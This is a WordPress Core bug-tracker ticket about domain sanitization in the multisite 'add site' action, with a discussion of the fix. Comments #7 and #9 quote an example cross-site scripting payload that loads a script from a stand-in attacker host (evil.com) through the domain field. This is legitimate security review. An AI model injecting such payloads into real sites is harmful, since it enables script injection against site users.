Make WordPress Core

Opened 13 years ago

Closed 13 years ago

#11777 closed defect (bug) (fixed)

ms-edit.php / addblog action improperly sanitizes domains

Reported by: denis-de-bernardy's profile Denis-de-Bernardy Owned by: ryan's profile ryan
Milestone: 3.0 Priority: normal
Severity: normal Version: 3.0
Component: Security Keywords:
Focuses: multisite Cc:

Description

it uses sanitize_user in non-strict mode with a twist:

$domain = sanitize_user( str_replace( '/', '', $blog[ 'domain' ] ) );

as I read sanitize_user, this can allow for subdomains with improper characters in them.

Change History (10)

#1 @nacin
13 years ago

  • Keywords multisite added

#2 follow-up: @Denis-de-Bernardy
13 years ago

ms-options.php has a slightly different approach to sanitization, which is equally bug prone:

$blogname = untrailingslashit( sanitize_user( str_replace( '.', , str_replace( $current_site->domain . $current_site->path, , $details->domain . $details->path ) ) ) );

#4 @wpmuguru
13 years ago

(In [13630]) block invalid site names/urls in add site, see #11777

#5 in reply to: ↑ 2 @wpmuguru
13 years ago

Replying to Denis-de-Bernardy:

ms-options.php has a slightly different approach to sanitization, which is equally bug prone:

$blogname = untrailingslashit( sanitize_user( str_replace( '.', , str_replace( $current_site->domain . $current_site->path, , $details->domain . $details->path ) ) ) );

That's for display only. If the dashboard blog is dashboard.domain.com or domain.com/dashboard, then dashboard is shown in the textbox.

#6 @wpmuguru
13 years ago

  • Resolution set to fixed
  • Status changed from new to closed

#7 follow-up: @Denis-de-Bernardy
13 years ago

doesn't r13630 allow a completely unsanitized domain name to go in provided it contains -- in it? such as:

evil--<script src="http://evil.com/xss.js"></script>

#8 @Denis-de-Bernardy
13 years ago

  • Resolution fixed deleted
  • Status changed from closed to reopened

#9 in reply to: ↑ 7 @wpmuguru
13 years ago

Replying to Denis-de-Bernardy:

doesn't r13630 allow a completely unsanitized domain name to go in provided it contains -- in it? such as:

evil--<script src="http://evil.com/xss.js"></script>

It would block that. See line 139

if ( ! preg_match( '/(--)/', $blog[ 'domain' ] ) && preg_match( '|^([a-zA-Z0-9-])+$|', $blog[ 'domain' ] ) )

The only characters allowed in the domain name are a-zA-Z0-9-.

#10 @nacin
13 years ago

  • Resolution set to fixed
  • Status changed from reopened to closed
Note: See TracTickets for help on using tickets.